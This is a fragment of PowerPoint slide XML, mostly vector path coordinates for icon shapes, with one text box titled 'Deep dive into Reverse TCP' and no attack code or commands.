                    <a:pt x="1520414" y="2894301"/>
                    <a:pt x="1643585" y="2704580"/>
                    <a:pt x="1724974" y="2406930"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1726723" y="2399874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1605728" y="2358846"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1795887" y="2033026"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1694075" y="2094586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578650" y="2155153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618821" y="2173994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1763952" y="2229138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="2076334"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="969005" y="2030800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="2076334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997942" y="2219324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135534" y="2169774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176026" y="2151638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061678" y="2089068"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2270995" y="1682607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2193789" y="1749541"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2157450" y="1779622"/>
                    <a:pt x="2119670" y="1809519"/>
                    <a:pt x="2080535" y="1839120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1988274" y="1905861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929983" y="2282840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032699" y="2311732"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2281801" y="2367725"/>
                    <a:pt x="2467430" y="2349840"/>
                    <a:pt x="2530541" y="2244806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2601541" y="2126643"/>
                    <a:pt x="2502356" y="1923350"/>
                    <a:pt x="2289139" y="1700285"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="491768" y="1666932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="473585" y="1684439"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="256508" y="1903749"/>
                    <a:pt x="153790" y="2105280"/>
                    <a:pt x="222717" y="2224664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283985" y="2330784"/>
                    <a:pt x="469273" y="2351906"/>
                    <a:pt x="719315" y="2300269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="831176" y="2270901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776012" y="1899134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679735" y="1826895"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="616990" y="1777691"/>
                    <a:pt x="557836" y="1727770"/>
                    <a:pt x="502637" y="1677612"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2001099" y="1443878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2005588" y="1555029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000712" y="1675767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038461" y="1648469"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2070345" y="1623579"/>
                    <a:pt x="2101053" y="1598643"/>
                    <a:pt x="2130505" y="1573751"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143759" y="1562074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039991" y="1473050"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="764411" y="1434288"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726661" y="1461587"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="694778" y="1486477"/>
                    <a:pt x="664070" y="1511412"/>
                    <a:pt x="634617" y="1536305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="621360" y="1547985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725129" y="1637009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764024" y="1666183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759534" y="1555029"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1386966" y="1049980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160689" y="1170734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947211" y="1303680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938816" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947046" y="1801432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154015" y="1935392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378151" y="2060078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604433" y="1939321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817909" y="1806377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826304" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818074" y="1308628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611105" y="1174667"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1767179" y="890733"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1629589" y="940281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589093" y="958419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703444" y="1020991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796116" y="1079257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="1033723"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001168" y="880921"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="1033723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969233" y="1077033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071048" y="1015472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186470" y="954907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146299" y="936065"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2296662" y="783036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2224233" y="781291"/>
                    <a:pt x="2139574" y="790423"/>
                    <a:pt x="2045808" y="809787"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1933945" y="839155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989111" y="1210925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085387" y="1283163"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2148132" y="1332368"/>
                    <a:pt x="2207286" y="1382289"/>
                    <a:pt x="2262485" y="1432446"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2273353" y="1443125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291537" y="1425616"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2508615" y="1206306"/>
                    <a:pt x="2611333" y="1004776"/>
                    <a:pt x="2542406" y="885391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2504113" y="819067"/>
                    <a:pt x="2417375" y="785944"/>
                    <a:pt x="2296662" y="783036"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482072" y="767202"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361326" y="768003"/>
                    <a:pt x="274023" y="799606"/>
                    <a:pt x="234579" y="865253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163579" y="983417"/>
                    <a:pt x="262764" y="1186709"/>
                    <a:pt x="475981" y="1409774"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="494126" y="1427453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571333" y="1360517"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="607672" y="1330436"/>
                    <a:pt x="645452" y="1300540"/>
                    <a:pt x="684587" y="1270938"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="776848" y="1204197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835139" y="827220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732420" y="798327"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="639007" y="777329"/>
                    <a:pt x="554520" y="766721"/>
                    <a:pt x="482072" y="767202"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382560" y="215755"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1244707" y="215755"/>
                    <a:pt x="1121535" y="405476"/>
                    <a:pt x="1040146" y="703126"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1038397" y="710184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159394" y="751212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388689" y="852872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619722" y="755229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729016" y="720284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724974" y="703126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1643585" y="405476"/>
                    <a:pt x="1520414" y="215755"/>
                    <a:pt x="1382560" y="215755"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382561" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1576111" y="0"/>
                    <a:pt x="1749046" y="220285"/>
                    <a:pt x="1863319" y="565886"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1892754" y="669221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998805" y="644109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2355240" y="570272"/>
                    <a:pt x="2632481" y="609896"/>
                    <a:pt x="2729256" y="777515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2826030" y="945133"/>
                    <a:pt x="2721726" y="1205043"/>
                    <a:pt x="2479563" y="1476806"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2396868" y="1564493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415853" y="1583149"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2697403" y="1884053"/>
                    <a:pt x="2823474" y="2176199"/>
                    <a:pt x="2715481" y="2355928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2615796" y="2521833"/>
                    <a:pt x="2337906" y="2556612"/>
                    <a:pt x="1982813" y="2476565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1890625" y="2453030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863319" y="2544172"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1749047" y="2889773"/>
                    <a:pt x="1576111" y="3110058"/>
                    <a:pt x="1382561" y="3110058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1189012" y="3110058"/>
                    <a:pt x="1016076" y="2889773"/>
                    <a:pt x="901803" y="2544172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="872368" y="2440837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766317" y="2465949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="409882" y="2539787"/>
                    <a:pt x="132641" y="2500163"/>
                    <a:pt x="35866" y="2332544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-60908" y="2164925"/>
                    <a:pt x="43396" y="1905015"/>
                    <a:pt x="285559" y="1633252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="368254" y="1545565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349269" y="1526910"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67719" y="1226005"/>
                    <a:pt x="-58351" y="933860"/>
                    <a:pt x="49641" y="754130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149326" y="588226"/>
                    <a:pt x="427216" y="553446"/>
                    <a:pt x="782309" y="633493"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="874497" y="657029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901803" y="565886"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1016076" y="220285"/>
                    <a:pt x="1189012" y="0"/>
                    <a:pt x="13825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9C9A370C-239C-46DD-B40B-9E055DB25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6004" y="3682990"/>
              <a:ext cx="320490" cy="269438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3985089" h="3350285">
                  <a:moveTo>
                    <a:pt x="1489879" y="1687056"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1413602" y="1687056"/>
                    <a:pt x="1351768" y="1748890"/>
                    <a:pt x="1351768" y="1825167"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1351768" y="1828965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351768" y="1905242"/>
                    <a:pt x="1413602" y="1967076"/>
                    <a:pt x="1489879" y="1967076"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1717713" y="1967076"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1793990" y="1967076"/>
                    <a:pt x="1855824" y="1905242"/>
                    <a:pt x="1855824" y="1828965"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1855824" y="1825167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1855824" y="1748890"/>
                    <a:pt x="1793990" y="1687056"/>
                    <a:pt x="1717713" y="1687056"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2281462" y="1675141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2205185" y="1675141"/>
                    <a:pt x="2143351" y="1736975"/>
                    <a:pt x="2143351" y="1813252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143351" y="1817050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2143351" y="1893327"/>
                    <a:pt x="2205185" y="1955161"/>
                    <a:pt x="2281462" y="1955161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2509296" y="1955161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2585573" y="1955161"/>
                    <a:pt x="2647407" y="1893327"/>
                    <a:pt x="2647407" y="1817050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2647407" y="1813252"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="1736975"/>
                    <a:pt x="2585573" y="1675141"/>
                    <a:pt x="2509296" y="1675141"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="1159396"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="1159396"/>
                    <a:pt x="2645713" y="1245278"/>
                    <a:pt x="2645713" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="1457158"/>
                    <a:pt x="2731595" y="1543040"/>
                    <a:pt x="2837535" y="1543040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="1543040"/>
                    <a:pt x="3029357" y="1457158"/>
                    <a:pt x="3029357" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="1245278"/>
                    <a:pt x="2943475" y="1159396"/>
                    <a:pt x="2837535" y="1159396"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3235655" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3129715" y="750352"/>
                    <a:pt x="3043833" y="836234"/>
                    <a:pt x="3043833" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3043833" y="1048114"/>
                    <a:pt x="3129715" y="1133996"/>
                    <a:pt x="3235655" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3341595" y="1133996"/>
                    <a:pt x="3427477" y="1048114"/>
                    <a:pt x="3427477" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3427477" y="836234"/>
                    <a:pt x="3341595" y="750352"/>
                    <a:pt x="3235655" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2455585" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2349645" y="750352"/>
                    <a:pt x="2263763" y="836234"/>
                    <a:pt x="2263763" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2263763" y="1048114"/>
                    <a:pt x="2349645" y="1133996"/>
                    <a:pt x="2455585" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2561525" y="1133996"/>
                    <a:pt x="2647407" y="1048114"/>
                    <a:pt x="2647407" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="836234"/>
                    <a:pt x="2561525" y="750352"/>
                    <a:pt x="2455585" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="941776" y="640989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="640989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="881020"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1061785" y="459017"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="762440" y="459017"/>
                    <a:pt x="519773" y="701684"/>
                    <a:pt x="519773" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519773" y="1300374"/>
                    <a:pt x="762440" y="1543041"/>
                    <a:pt x="1061785" y="1543041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1361130" y="1543041"/>
                    <a:pt x="1603797" y="1300374"/>
                    <a:pt x="1603797" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1603797" y="701684"/>
                    <a:pt x="1361130" y="459017"/>
                    <a:pt x="1061785" y="459017"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="359296"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="359296"/>
                    <a:pt x="2645713" y="445178"/>
                    <a:pt x="2645713" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="657058"/>
                    <a:pt x="2731595" y="742940"/>
                    <a:pt x="2837535" y="742940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="742940"/>
                    <a:pt x="3029357" y="657058"/>
                    <a:pt x="3029357" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="445178"/>
                    <a:pt x="2943475" y="359296"/>
                    <a:pt x="2837535" y="359296"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="927799" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2978398" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3447374" y="0"/>
                    <a:pt x="3902811" y="418280"/>
                    <a:pt x="3926614" y="887256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4011721" y="1784310"/>
                    <a:pt x="4065643" y="3326870"/>
                    <a:pt x="3630620" y="3349891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3101375" y="3362701"/>
                    <a:pt x="2778421" y="2566209"/>
                    <a:pt x="2352321" y="2174369"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1572952" y="2174369"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1161652" y="2566210"/>
                    <a:pt x="901104" y="3370635"/>
                    <a:pt x="339051" y="3349892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-171518" y="3349299"/>
                    <a:pt x="45251" y="1463012"/>
                    <a:pt x="48163" y="849156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48163" y="380180"/>
                    <a:pt x="458823" y="0"/>
                    <a:pt x="927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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87D4543-E180-4DF6-A62E-340B16086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95" y="3961380"/>
              <a:ext cx="348693" cy="269437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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E01154-688D-4F5A-ACE4-7E1F6AF2E45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6822" y="3332187"/>
              <a:ext cx="299221" cy="322665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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083C078B-CB36-4448-B100-8BECDC326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6432" y="2099615"/>
              <a:ext cx="296548" cy="296548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8508A6-2707-40ED-98D7-03C1932691B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08791" y="4297323"/>
              <a:ext cx="336694" cy="323742"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3948393" h="3817544">
                  <a:moveTo>
                    <a:pt x="1888045" y="2370407"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1180379" y="2998560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695350" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703301" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1888044" y="3817544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1885393" y="3356368"/>
                    <a:pt x="1874793" y="2911096"/>
                    <a:pt x="1888045" y="2370407"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2059390" y="2370407"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2072642" y="2911096"/>
                    <a:pt x="2062042" y="3356368"/>
                    <a:pt x="2059391" y="3817544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3244134" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3252085" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2767056" y="2998560"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="733907" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2113471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170450" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1919327" y="2170968"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3206900" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2021479" y="2170968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770356" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3940806" y="2113471"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1195981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10560" y="719101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759438" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929887" y="661605"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2762973" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2029067" y="661605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3199516" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948393" y="719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9ED16-E476-4E17-A34C-B1B46D12815D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705632" y="4148811"/>
            <a:ext cx="164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Deep dive into Reverse TCP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275C19-BA54-4650-B131-3F27D4E65004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8045579" y="2409380"/>
            <a:ext cx="2811142" cy="2844985"/>
            <a:chOff x="8045579" y="2409380"/>
            <a:chExt cx="2811142" cy="2844985"/>
          </a:xfrm>
        </p:grpSpPr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D5FFF734-6862-424E-A388-EF245D0D57E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10509374" y="3444941"/>
              <a:ext cx="343339" cy="343339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39952090-A2AE-4DA8-A3DA-62986F260D10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8174482" y="417483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C9A03E33-5D13-4BFE-9600-571F01E84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5535" y="2409380"/>
              <a:ext cx="393582" cy="392828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Trapezoid 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD1CF70-6406-4C32-BF96-0C20604B317A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10073915" y="2714730"/>
              <a:ext cx="351357" cy="423598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Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5905C8AA-7159-4608-899A-6C22426D61BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3600000">
              <a:off x="8507130" y="4424299"/>
              <a:ext cx="162074" cy="478539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1327763" h="3920353">
                  <a:moveTo>
                    <a:pt x="483881" y="2840232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="843881" y="2840232"/>
